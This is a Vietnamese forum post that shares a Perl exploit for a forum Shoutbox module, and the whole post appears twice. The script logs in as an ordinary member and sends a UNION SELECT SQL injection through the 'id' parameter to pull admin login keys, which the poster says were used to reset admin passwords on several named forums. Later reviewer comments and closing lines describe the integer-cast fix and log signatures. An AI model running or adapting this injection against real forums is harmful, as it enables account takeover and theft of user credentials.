boymc
06-08-06, 08:35 PM
Đây là đoạn code được dùng để reset lại pass admin của 4rum BTX, HVF, PDL và nhiều site khác.
################################################
#!/usr/bin/perl#
# D21-Shoutbox #
# Author : longnhi #
# Exploit Coded by Windak & langtuhaohoa #
# We are : Www.HceGroup.Net - Www.HceGroup.Biz #
################################################
# Reviewer overview: the script authenticates to a forum with ordinary member
# credentials, then issues a single GET to the Shoutbox module
# (act=Shoutbox, view=mycp, sub=ignored, do=add) whose `id` parameter carries a
# UNION SELECT against the members table. It prints a 32-character value found
# after "uid=" in the response.
# Defensive reading: the request can only succeed if the module places `id`
# into its SQL without forcing it to an integer -- presumably the root cause;
# confirm in the module source. The fix is an integer cast or a bound parameter
# on `id`. In web access logs the trace is a Shoutbox request whose `id`
# contains "union select" and "member_login_key", sent from a logged-in session.
# NOTE(review): there is no `use strict` / `use warnings`, which is why the
# undeclared names further down go unreported.
use HTTP::Cookies;
use LWP 5.64;
# NOTE(review): part of this module name (and of the method name on the
# "redirectable" line below) is masked with asterisks, apparently by the
# forum's word filter, so the listing does not compile as posted.
use HTTP::R******;
# variables
# Query string of the board's login handler; appended to the base URL.
my $login_page = '?act=Login&CODE=01';
# Placeholders only: both are declared again with `my` when read from STDIN.
my $id = '';
my $table_fix = '';
# NOTE(review): never read; the GET below uses $post_pm_page, a different,
# undeclared (and therefore empty) variable.
my $pose_pm_page = '?';
# Controls how often the login POST is repeated.
my $tries = 5;
my $sql = '';
# Unused.
my $i;
my $j;
# objects
my $ua = LWP::UserAgent->new;
# Cookie jar with autosave switched off.
my $cj = HTTP::Cookies->new (file => "N/A", autosave => 0);
my $resp;
# init the cookie jar
$ua->cookie_jar ($cj);
# allow redirects on post r******s
push @{ $ua->r******s_redirectable }, "POST";
# get user input
print ' Forum Use D21-Shoutbox URL ? ';
chomp (my $base_url = <STDIN>);
print 'Your username ? ';
chomp (my $user = <STDIN>);
# Stored in an undeclared %form hash that nothing else in the script reads.
$form{entered_name} = $user;
print 'Your pass ? ';
# systems without stty will error otherwise
my $stty = -x '/bin/stty';
system 'stty -echo' if $stty;# to turn off echoing
chomp (my $pass = <STDIN>);
system 'stty echo' if $stty;# to turn it back on
print "\n" if $stty;
print 'id you want get hashpass? ';# it'll say next to one of their posts
# $id and $table_fix are taken verbatim from STDIN and concatenated into the
# query string further down.
chomp (my $id = <STDIN>);
print ' Table prefix ( ex : ibf_ ) ? ';
chomp ( my $table_fix = <STDIN>);
# parse the given base url
# Prepend http:// when missing; append "/" unless the URL already ends in "/"
# or "index.php".
if ($base_url !~ m#^http://#) { $base_url = 'http://' . $base_url }
if ($base_url !~ m#/$|index\.php$#) { $base_url .= '/' }
# Log in with the supplied member credentials; the POST is repeated while the
# response is not a success and $tries is still non-zero. The later request is
# therefore made from an authenticated member session.
do {
$resp = $ua->post ($base_url . $login_page,
[ UserName => $user,
PassWord => $pass,
CookieDate => 1,
]);
} while ($tries-- && !$resp->is_success());
# did we get 200 (OK) ?
if (!$resp->is_success()) { die 'Error: ' . $resp->status_line . "\n" }
# was the pass right ?
if ($resp->content =~ /sorry, the password was wrong/i) {
die "Error: password incorrect.\n";
}
# Unbuffered STDOUT so the progress text appears immediately.
$| = 1;
print "\nAttempting to extract password hash from database...\n ";
# The `id` value is "-1" followed by a UNION SELECT of member_login_key from
# <prefix>members for the chosen member id, then "/*" to comment out whatever
# follows in the original statement. A server-side integer cast on `id`
# rejects this value outright.
# NOTE(review): member_login_key looks like the board's persistent-login token
# rather than the stored password hash -- confirm against the board version;
# if so, regenerating it for affected members invalidates a leaked value.
$sql = "?act=Shoutbox&view=mycp&sub=ignored&do=add&id=-1 union select member_login_key,1,1 from ".$table_fix."members where id=". $id ."/*";
$resp = $ua->get ($base_url . $post_pm_page . $sql );
if (!$resp->is_success()) {
print "ERROR";
}
else {
print "";
#print $resp->content;
$rs=$resp->content;
# Looks for "uid=" followed by 32 characters from a-z, 0-9 or "," (the comma
# is a literal member of the class) -- presumably the selected column echoed
# back by the module in a link.
if ( $rs =~ /uid=([a-z,0-9]{32})/ ) {print "HASH : ";print $1;
print "\n \n Bug Hunter By : Longnhi \n";
print "Exploit Coded By : Windak & langtuhaohoa ! We are : Www.HceGroup.Net ! ";
}
# No match: the raw response body is printed instead.
else { print "Can't get the pass from output, try to find it manually : "; print $resp->content;}
}
print "\x08 \x08\n hehehe ! Good luck to **** !.\n";
# Wait for Enter before exiting.
<STDIN>;
http://img123.imageshack.us/img123/231/untitledjt3.jpg
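Trước khi nó **** thì nó phải forgot pass admin để tạo pass hash, sau đó lấy pass hash đó để reset pass admin. ;)
Ai bị thì fix lại code shoutbox (ép tham số id về kiểu số nguyên trước khi đưa vào câu lệnh SQL) và thêm firewall cho thư mục admin là xong. Nên kiểm tra thêm access log xem có request act=Shoutbox nào chứa "union select" trong tham số id không.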
################################################
#!/usr/bin/perl#
# D21-Shoutbox #
# Author : longnhi #
# Exploit Coded by Windak & langtuhaohoa #
# We are : Www.HceGroup.Net - Www.HceGroup.Biz #
################################################
# Reviewer overview: the script authenticates to a forum with ordinary member
# credentials, then issues a single GET to the Shoutbox module
# (act=Shoutbox, view=mycp, sub=ignored, do=add) whose `id` parameter carries a
# UNION SELECT against the members table. It prints a 32-character value found
# after "uid=" in the response.
# Defensive reading: the request can only succeed if the module places `id`
# into its SQL without forcing it to an integer -- presumably the root cause;
# confirm in the module source. The fix is an integer cast or a bound parameter
# on `id`. In web access logs the trace is a Shoutbox request whose `id`
# contains "union select" and "member_login_key", sent from a logged-in session.
# NOTE(review): there is no `use strict` / `use warnings`, which is why the
# undeclared names further down go unreported.
use HTTP::Cookies;
use LWP 5.64;
# NOTE(review): part of this module name (and of the method name on the
# "redirectable" line below) is masked with asterisks, apparently by the
# forum's word filter, so the listing does not compile as posted.
use HTTP::R******;
# variables
# Query string of the board's login handler; appended to the base URL.
my $login_page = '?act=Login&CODE=01';
# Placeholders only: both are declared again with `my` when read from STDIN.
my $id = '';
my $table_fix = '';
# NOTE(review): never read; the GET below uses $post_pm_page, a different,
# undeclared (and therefore empty) variable.
my $pose_pm_page = '?';
# Controls how often the login POST is repeated.
my $tries = 5;
my $sql = '';
# Unused.
my $i;
my $j;
# objects
my $ua = LWP::UserAgent->new;
# Cookie jar with autosave switched off.
my $cj = HTTP::Cookies->new (file => "N/A", autosave => 0);
my $resp;
# init the cookie jar
$ua->cookie_jar ($cj);
# allow redirects on post r******s
push @{ $ua->r******s_redirectable }, "POST";
# get user input
print ' Forum Use D21-Shoutbox URL ? ';
chomp (my $base_url = <STDIN>);
print 'Your username ? ';
chomp (my $user = <STDIN>);
# Stored in an undeclared %form hash that nothing else in the script reads.
$form{entered_name} = $user;
print 'Your pass ? ';
# systems without stty will error otherwise
my $stty = -x '/bin/stty';
system 'stty -echo' if $stty;# to turn off echoing
chomp (my $pass = <STDIN>);
system 'stty echo' if $stty;# to turn it back on
print "\n" if $stty;
print 'id you want get hashpass? ';# it'll say next to one of their posts
# $id and $table_fix are taken verbatim from STDIN and concatenated into the
# query string further down.
chomp (my $id = <STDIN>);
print ' Table prefix ( ex : ibf_ ) ? ';
chomp ( my $table_fix = <STDIN>);
# parse the given base url
# Prepend http:// when missing; append "/" unless the URL already ends in "/"
# or "index.php".
if ($base_url !~ m#^http://#) { $base_url = 'http://' . $base_url }
if ($base_url !~ m#/$|index\.php$#) { $base_url .= '/' }
# Log in with the supplied member credentials; the POST is repeated while the
# response is not a success and $tries is still non-zero. The later request is
# therefore made from an authenticated member session.
do {
$resp = $ua->post ($base_url . $login_page,
[ UserName => $user,
PassWord => $pass,
CookieDate => 1,
]);
} while ($tries-- && !$resp->is_success());
# did we get 200 (OK) ?
if (!$resp->is_success()) { die 'Error: ' . $resp->status_line . "\n" }
# was the pass right ?
if ($resp->content =~ /sorry, the password was wrong/i) {
die "Error: password incorrect.\n";
}
# Unbuffered STDOUT so the progress text appears immediately.
$| = 1;
print "\nAttempting to extract password hash from database...\n ";
# The `id` value is "-1" followed by a UNION SELECT of member_login_key from
# <prefix>members for the chosen member id, then "/*" to comment out whatever
# follows in the original statement. A server-side integer cast on `id`
# rejects this value outright.
# NOTE(review): member_login_key looks like the board's persistent-login token
# rather than the stored password hash -- confirm against the board version;
# if so, regenerating it for affected members invalidates a leaked value.
$sql = "?act=Shoutbox&view=mycp&sub=ignored&do=add&id=-1 union select member_login_key,1,1 from ".$table_fix."members where id=". $id ."/*";
$resp = $ua->get ($base_url . $post_pm_page . $sql );
if (!$resp->is_success()) {
print "ERROR";
}
else {
print "";
#print $resp->content;
$rs=$resp->content;
# Looks for "uid=" followed by 32 characters from a-z, 0-9 or "," (the comma
# is a literal member of the class) -- presumably the selected column echoed
# back by the module in a link.
if ( $rs =~ /uid=([a-z,0-9]{32})/ ) {print "HASH : ";print $1;
print "\n \n Bug Hunter By : Longnhi \n";
print "Exploit Coded By : Windak & langtuhaohoa ! We are : Www.HceGroup.Net ! ";
}
# No match: the raw response body is printed instead.
else { print "Can't get the pass from output, try to find it manually : "; print $resp->content;}
}
print "\x08 \x08\n hehehe ! Good luck to **** !.\n";
# Wait for Enter before exiting.
<STDIN>;
http://img123.imageshack.us/img123/231/untitledjt3.jpg
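Trước khi nó **** thì nó phải forgot pass admin để tạo pass hash, sau đó lấy pass hash đó để reset pass admin. ;)
Ai bị thì fix lại code shoutbox (ép tham số id về kiểu số nguyên trước khi đưa vào câu lệnh SQL) và thêm firewall cho thư mục admin là xong. Nên kiểm tra thêm access log xem có request act=Shoutbox nào chứa "union select" trong tham số id không.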